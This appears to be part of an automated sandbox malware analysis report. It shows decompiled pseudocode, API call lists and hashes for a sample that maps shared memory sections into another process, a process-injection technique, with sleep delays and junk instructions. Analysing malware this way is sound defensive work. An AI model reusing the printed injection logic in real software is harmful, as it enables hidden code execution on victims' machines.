				void* _t202;
				void* _t203;
				void* _t205;
				intOrPtr* _t206;
				void* _t211;

				_push(0x387);
				_t206 = _t205 + 4;
				_push(0x83);
				L004011F5(_t175, _t211);
				_t126 =  *((intOrPtr*)(_t203 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t203 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
				}
				while(1) {
					_t86 =  *((intOrPtr*)(_t126 + 0x48))();
					if(_t86 != 0) {
						break;
					}
					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t203 - 0x5c)) = _t86;
				_t185 = _t203 - 0x60;
				 *_t185 = _t176;
				 *((intOrPtr*)(_t126 + 0x4c))(_t86, _t185);
				_t89 =  *_t185;
				if(_t89 != 0) {
					_t132 = _t203 - 0x30;
					 *_t132 = _t89;
					 *(_t132 + 4) = _t176;
					_t187 = _t203 - 0x28;
					 *((intOrPtr*)(_t126 + 0x10))(_t187, 0x18);
					 *_t187 = 0x18;
					_push(_t203 - 0x30);
					_push(_t187);
					_push(0x40);
					_push(_t203 - 0x10);
					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t203 - 8) = _t176;
						_t96 = _t203 - 0x50;
						 *(_t96 + 4) = _t176;
						 *_t96 = 0x5000;
						_t188 = _t203 - 0x54;
						if(NtCreateSection(_t188, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t203 - 0x50);
							_t120 = _t203 - 0x44;
							 *_t120 = _t176;
							if(NtMapViewOfSection( *_t188, 0xffffffff, _t120, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
								_t122 = _t203 - 0x3c;
								 *_t122 = _t176;
								if(NtMapViewOfSection( *_t188,  *(_t203 - 0xc), _t122, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
									_t202 =  *(_t203 - 0x44);
									 *((intOrPtr*)(_t126 + 0x20))(_t176, _t202, 0x104);
									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
									 *(_t203 - 8) =  *(_t203 - 8) + 1;
								}
							}
						}
						_t98 = _t203 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
						_t189 = _t203 - 0x58;
						_t99 = NtCreateSection(_t189, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
						if (_t99 != 0) goto L64;
						 *_t99 =  *_t99 + _t99;
					}
				}
				_push(0x15a4);
				_t90 =  *_t206;
				_push(0x83);
				L004011F5(_t176, _t232);
				return _t90;
			}

0x00401578
0x00401580
0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.379636129.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 23d6bc309405edc7f8da1be2c541e8d9f5b1e81b56b2c35d9e42197813f8af09
Instruction ID: 9d9f292dd7e40d4d2d6115b75542e29ae97a3c703512c5fffb38717ec82669a3
Opcode Fuzzy Hash: 23d6bc309405edc7f8da1be2c541e8d9f5b1e81b56b2c35d9e42197813f8af09
Instruction Fuzzy Hash: 36511A75900249BFEB209F91CC48FAF7BB8FF85B14F10416AFA11BA1A5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040159A Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E0040159A() {
				intOrPtr _t86;
				struct _EXCEPTION_RECORD _t89;
				intOrPtr _t90;
				struct _GUID _t96;
				struct _GUID _t98;
				long _t99;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t127;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t184;
				intOrPtr* _t186;
				HANDLE* _t187;
				HANDLE* _t188;
				void* _t201;
				void* _t202;
				intOrPtr* _t204;
				void* _t209;

				_push(0x83);
				L004011F5(_t175, _t209);
				_t127 =  *((intOrPtr*)(_t202 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t202 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
				}
				while(1) {
					_t86 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t86 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t202 - 0x5c)) = _t86;
				_t184 = _t202 - 0x60;
				 *_t184 = _t176;
				 *((intOrPtr*)(_t127 + 0x4c))(_t86, _t184);
				_t89 =  *_t184;
				if(_t89 != 0) {
					_t132 = _t202 - 0x30;
					 *_t132 = _t89;
					 *(_t132 + 4) = _t176;
					_t186 = _t202 - 0x28;
					 *((intOrPtr*)(_t127 + 0x10))(_t186, 0x18);
					 *_t186 = 0x18;
					_push(_t202 - 0x30);
					_push(_t186);
					_push(0x40);
					_push(_t202 - 0x10);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t202 - 8) = _t176;
						_t96 = _t202 - 0x50;
						 *(_t96 + 4) = _t176;
						 *_t96 = 0x5000;
						_t187 = _t202 - 0x54;
						if(NtCreateSection(_t187, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t202 - 0x50);
							_t120 = _t202 - 0x44;
							 *_t120 = _t176;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t120, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
								_t122 = _t202 - 0x3c;
								 *_t122 = _t176;
								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t122, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
									_t201 =  *(_t202 - 0x44);
									 *((intOrPtr*)(_t127 + 0x20))(_t176, _t201, 0x104);
									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
									 *(_t202 - 8) =  *(_t202 - 8) + 1;
								}
							}
						}
						_t98 = _t202 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
						_t188 = _t202 - 0x58;
						_t99 = NtCreateSection(_t188, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
						if (_t99 != 0) goto L61;
						 *_t99 =  *_t99 + _t99;
					}
				}
				_push(0x15a4);
				_t90 =  *_t204;
				_push(0x83);
				L004011F5(_t176, _t230);
				return _t90;
			}

0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.379636129.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 4dff7dc5d51454a43d874152b5abf798c4daef4429b50565c24c7d2891ff9f85
Instruction ID: 1cd82c906aaffff485458f801d6ba595cb0416390f7e33d4f9d681d8d529f326
Opcode Fuzzy Hash: 4dff7dc5d51454a43d874152b5abf798c4daef4429b50565c24c7d2891ff9f85
Instruction Fuzzy Hash: BF510971900249BFEB209F92CC48F9FBBB8FF85B14F104159FA11AA2A5D6749940CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401749 Relevance: 3.0, APIs: 2, Instructions: 40
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.379636129.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 645c41685cf09351304fde75ab205f83a01d627caff4926b51e1c70b330bbf47
Instruction ID: 088a864a315bec2a81033f27f4cad91d314b4a72151043dcf738e9c9ac7e5ebb
Opcode Fuzzy Hash: 645c41685cf09351304fde75ab205f83a01d627caff4926b51e1c70b330bbf47
Instruction Fuzzy Hash: 0E011475500288FEEB219F92CC49FAF7FB9EF82B10F08016AF510B61E5E2714980CB20

Uniqueness

Uniqueness Score: -1.00%

Function 0040A354 Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___initmbctable.LIBCMT ref: 0040A35C

Part of subcall function 0040C63D: __setmbcp.LIBCMT ref: 0040C648

Memory Dump Source

Source File: 00000000.00000002.379645990.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_file.jbxd

Similarity

API ID: ___initmbctable__setmbcp
String ID:
API String ID: 2112888233-0
Opcode ID: 38afab757e8f1bf25f4e7a50a942883c92c5ab1aac48d1f0aa2e5f8f1f573800
Instruction ID: f1c1c2783fabe4eea28a351e9f4ac63c050765bac6a290c9e949a9cadb4d6fc4
Opcode Fuzzy Hash: 38afab757e8f1bf25f4e7a50a942883c92c5ab1aac48d1f0aa2e5f8f1f573800
Instruction Fuzzy Hash: 452108B39043105BE7311B35AD45B6737989B51339F25013FEC91B21D2DE7E8862866F

Uniqueness

Uniqueness Score: -1.00%

Function 0040A809 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040A81E

Memory Dump Source

Source File: 00000000.00000002.379645990.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_file.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 6257122c168b14a4d9514a5d42c5e8dec63049703687e45649a60d1e1a8beb9b
Instruction ID: 9f2627d6d3eb8e56ea3badd99d2cf6ca01e9c445727d8f4301bef28060a7e072
Opcode Fuzzy Hash: 6257122c168b14a4d9514a5d42c5e8dec63049703687e45649a60d1e1a8beb9b
Instruction Fuzzy Hash: 41D05E32650304AFEB145F716C08B223BECE388395F008436B90CC6290F674C9A1D649

Uniqueness

Uniqueness Score: -1.00%

Function 00401932 Relevance: 1.3, APIs: 1, Instructions: 65
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 22%

			E00401932(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t12;
				intOrPtr* _t14;
				void* _t19;
				void* _t20;

				_push(0x1986);
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t19, __eflags);
				_t14 = _a4;
				Sleep(0x1388);
				_push( &_v8);
				_push(_a12);
				_push(_a8);
				_push(_t14); // executed
				_t10 = L00401467(_t19, _t20); // executed
				_t26 = _t10;
				if(_t10 != 0) {
					E00401558(_t14, _t10, _v8, _a16); // executed
				}
				 *_t14(0xffffffff, 0);
				_t12 = 0x1986;
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t19, _t26);
				return _t12;
			}

0x00401943
0x0040195b
0x0040196f
0x00401981
0x00401986
0x0040198e
0x00401994
0x00401995
0x00401998
0x0040199b
0x0040199c
0x004019a1
0x004019a3
0x004019ad
0x004019ad
0x004019b6
0x004019c2
0x004019cf
0x004019e1
0x004019ee
0x004019f7

APIs

Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E

Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000000.00000002.379636129.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 3fc1ef90b2a5b2730ee9b434eeb4b582bf46cdcd1d0460405fd1be13f8c58862
Instruction ID: f289286abcb0c8361d5bc883c0512fb430ce21eb2a0d87beead029bdd4c1ea53
Opcode Fuzzy Hash: 3fc1ef90b2a5b2730ee9b434eeb4b582bf46cdcd1d0460405fd1be13f8c58862
Instruction Fuzzy Hash: 6C11C2F1208204F7E7006A959D62E7A3669AB01714F304137BA43790F1D57D9913E76F

Uniqueness

Uniqueness Score: -1.00%

Function 0040193D Relevance: 1.3, APIs: 1, Instructions: 60
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 29%

			E0040193D(void* __eax, signed int __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t14;
				void* _t16;
				intOrPtr* _t18;
				void* _t30;
				signed int _t38;

				_t26 = __edi;
				asm("in eax, 0x45");
				_t2 = __eax - 0x7a;
				 *_t2 =  *(__eax - 0x7a) | __ecx;
				_t38 =  *_t2;
				_push(0x1986);
				_push(0x6d);
				_push(0xc5);
				L004011F5(__edi, _t38);
				_t18 =  *((intOrPtr*)(_t30 + 8));
				Sleep(0x1388);
				_push(_t30 - 4);
				_push( *((intOrPtr*)(_t30 + 0x10)));
				_push( *((intOrPtr*)(_t30 + 0xc)));
				_push(_t18); // executed
				_t14 = L00401467(__edi, __esi); // executed
				_t39 = _t14;
				if(_t14 != 0) {
					E00401558(_t18, _t14,  *((intOrPtr*)(_t30 - 4)),  *((intOrPtr*)(_t30 + 0x14))); // executed
				}
				 *_t18(0xffffffff, 0);
				_t16 = 0x1986;
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t26, _t39);
				return _t16;
			}

0x0040193d
0x00401940
0x00401942
0x00401942
0x00401942
0x00401943
0x0040195b
0x0040196f
0x00401981
0x00401986
0x0040198e
0x00401994
0x00401995
0x00401998
0x0040199b
0x0040199c
0x004019a1
0x004019a3
0x004019ad
0x004019ad
0x004019b6
0x004019c2
0x004019cf
0x004019e1
0x004019ee
0x004019f7

APIs

Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E

Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000000.00000002.379636129.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 886c6b7d3fd93a1d42f8c5386c1713bd20b837ff01857d39e84b1d41efe43a78
Instruction ID: 515f5f5985279033342f6d13e0d75d2e799464d7355665022411b06cc3c0c42c
Opcode Fuzzy Hash: 886c6b7d3fd93a1d42f8c5386c1713bd20b837ff01857d39e84b1d41efe43a78
Instruction Fuzzy Hash: 991129F2608285EBD7005BA18DA2EA937659F01710F20057BF6037E0F2D53D9513EB1B

Uniqueness

Uniqueness Score: -1.00%

Function 0040196C Relevance: 1.3, APIs: 1, Instructions: 48
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0040196C(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t9;
				void* _t11;
				intOrPtr* _t13;
				void* _t23;

				_t19 = __edi;
				_pop(es);
				asm("sbb bh, [eax+ebp*2]");
				_push(0xc5);
				L004011F5(__edi, __eflags);
				_t13 =  *((intOrPtr*)(_t23 + 8));
				Sleep(0x1388);
				_push(_t23 - 4);
				_push( *((intOrPtr*)(_t23 + 0x10)));
				_push( *((intOrPtr*)(_t23 + 0xc)));
				_push(_t13); // executed
				_t9 = L00401467(__edi, __esi); // executed
				_t29 = _t9;
				if(_t9 != 0) {
					E00401558(_t13, _t9,  *((intOrPtr*)(_t23 - 4)),  *((intOrPtr*)(_t23 + 0x14))); // executed
				}
				 *_t13(0xffffffff, 0);
				_t11 = 0x1986;
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t19, _t29);
				return _t11;
			}

0x0040196c
0x0040196c
0x0040196d
0x0040196f
0x00401981
0x00401986
0x0040198e
0x00401994
0x00401995
0x00401998
0x0040199b
0x0040199c
0x004019a1
0x004019a3
0x004019ad
0x004019ad
0x004019b6
0x004019c2
0x004019cf
0x004019e1
0x004019ee
0x004019f7

APIs

Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E

Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000000.00000002.379636129.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 54672eb5d74a33a50b4e0698c103b24abf47bf219929af624bad9b05e038b79e
Instruction ID: 3e47f40c2c79a3419effdd93610d16f961f2ccd470e9348de27537ec9d0296a5
Opcode Fuzzy Hash: 54672eb5d74a33a50b4e0698c103b24abf47bf219929af624bad9b05e038b79e
Instruction Fuzzy Hash: CA01F2B2208244EFCB005BE58CA1EAA3765AB05315F300133F603B90F2C93C8512EB6B

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rrjthgjPID: 7616, Parent PID: 1080COMMON

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	98%
Signature Coverage:	11.8%
Total number of Nodes:	102
Total number of Limit Nodes:	4

Executed Functions

Function 00401558 Relevance: 10.7, APIs: 7, Instructions: 206
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00401558(intOrPtr _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				struct _EXCEPTION_RECORD _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				intOrPtr _v56;
				long _v60;
				char _v64;
				void* _v68;
				char _v72;
				void* _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				void* __edi;
				intOrPtr _t87;
				struct _EXCEPTION_RECORD _t90;
				intOrPtr _t91;
				struct _GUID _t97;
				struct _GUID _t99;
				long _t100;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t183;
				intOrPtr* _t184;
				HANDLE* _t185;
				HANDLE* _t186;
				intOrPtr _t199;
				void* _t200;
				intOrPtr* _t201;
				void* _t205;

				_push(0x387);
				_t201 = _t200 + 4;
				_push(0x83);
				L004011F5(_t175, _t205);
				_t127 = _a4;
				_t176 = 0;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				_v96 = _t87;
				_t183 =  &_v100;
				 *_t183 = _t176;
				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t183);
				_t90 =  *_t183;
				if(_t90 != 0) {
					_t132 =  &_v52;
					 *_t132 = _t90;
					 *(_t132 + 4) = _t176;
					_t184 =  &_v44;
					 *((intOrPtr*)(_t127 + 0x10))(_t184, 0x18);
					 *_t184 = 0x18;
					_push( &_v52);
					_push(_t184);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t176, _t176, 2) == 0) {
						_v12 = _t176;
						_t97 =  &_v84;
						 *(_t97 + 4) = _t176;
						 *_t97 = 0x5000;
						_t185 =  &_v88;
						if(NtCreateSection(_t185, 6, _t176, _t97, 4, 0x8000000, _t176) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t121 =  &_v72;
							 *_t121 = _t176;
							if(NtMapViewOfSection( *_t185, 0xffffffff, _t121, _t176, _t176, _t176,  &_v60, 1, _t176, 4) == 0) {
								_t123 =  &_v64;
								 *_t123 = _t176;
								if(NtMapViewOfSection( *_t185, _v16, _t123, _t176, _t176, _t176,  &_v60, 1, _t176, 4) == 0) {
									_t199 = _v72;
									 *((intOrPtr*)(_t127 + 0x20))(_t176, _t199, 0x104);
									 *((intOrPtr*)(_t199 + 0x208)) = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t99 =  &_v84;
						 *(_t99 + 4) = _t176;
						 *_t99 = _a12 + 0x10000;
						_t186 =  &_v92;
						_t100 = NtCreateSection(_t186, 0xe, _t176, _t99, 0x40, 0x8000000, _t176);
						if (_t100 != 0) goto L67;
						 *_t100 =  *_t100 + _t100;
					}
				}
				_push(0x15a4);
				_t91 =  *_t201;
				_push(0x83);
				L004011F5(_t176, _t226);
				return _t91;
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000004.00000002.448489482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rrjthgj.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 94fb41d671dbeab80d9278360f7b723801272b6da464276eb8e79f9657775aa6
Instruction ID: 4afb5ad6e9f78dbb0f0fc4dd380045413720c66cee1019041566b0107d6eeca4
Opcode Fuzzy Hash: 94fb41d671dbeab80d9278360f7b723801272b6da464276eb8e79f9657775aa6
Instruction Fuzzy Hash: 2F615E71900208FBEB209F91CC49FAF7BB8EF85B14F10412AF912BA1E5D6749901DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00401564 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00401564(void* __eax, void* __edx, void* __esi) {
				intOrPtr _t89;
				struct _EXCEPTION_RECORD _t92;
				intOrPtr _t93;
				struct _GUID _t99;
				struct _GUID _t101;
				long _t102;
				PVOID* _t123;
				PVOID* _t125;
				intOrPtr _t129;
				struct _EXCEPTION_RECORD* _t135;
				void* _t179;
				struct _EXCEPTION_RECORD _t180;
				struct _EXCEPTION_RECORD* _t190;
				intOrPtr* _t192;
				HANDLE* _t193;
				HANDLE* _t194;
				void* _t207;
				void* _t208;
				void* _t210;
				intOrPtr* _t211;
				void* _t216;

				_t216 = __eax + 0x15a4b8;
				_push(0x387);
				_t211 = _t210 + 4;
				_push(0x83);
				L004011F5(_t179, _t216);
				_t129 =  *((intOrPtr*)(_t208 + 8));
				_t180 = 0;
				 *((intOrPtr*)(_t208 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t208 - 0x34)) =  *((intOrPtr*)(_t208 - 0x34)) + 1;
				}
				while(1) {
					_t89 =  *((intOrPtr*)(_t129 + 0x48))();
					if(_t89 != 0) {
						break;
					}
					 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t208 - 0x5c)) = _t89;
				_t190 = _t208 - 0x60;
				 *_t190 = _t180;
				 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t190);
				_t92 =  *_t190;
				if(_t92 != 0) {
					_t135 = _t208 - 0x30;
					 *_t135 = _t92;
					 *(_t135 + 4) = _t180;
					_t192 = _t208 - 0x28;
					 *((intOrPtr*)(_t129 + 0x10))(_t192, 0x18);
					 *_t192 = 0x18;
					_push(_t208 - 0x30);
					_push(_t192);
					_push(0x40);
					_push(_t208 - 0x10);
					if( *((intOrPtr*)(_t129 + 0x70))() == 0 && NtDuplicateObject( *(_t208 - 0x10), 0xffffffff, 0xffffffff, _t208 - 0xc, _t180, _t180, 2) == 0) {
						 *(_t208 - 8) = _t180;
						_t99 = _t208 - 0x50;
						 *(_t99 + 4) = _t180;
						 *_t99 = 0x5000;
						_t193 = _t208 - 0x54;
						if(NtCreateSection(_t193, 6, _t180, _t99, 4, 0x8000000, _t180) == 0) {
							 *_t25 =  *(_t208 - 0x50);
							_t123 = _t208 - 0x44;
							 *_t123 = _t180;
							if(NtMapViewOfSection( *_t193, 0xffffffff, _t123, _t180, _t180, _t180, _t208 - 0x38, 1, _t180, 4) == 0) {
								_t125 = _t208 - 0x3c;
								 *_t125 = _t180;
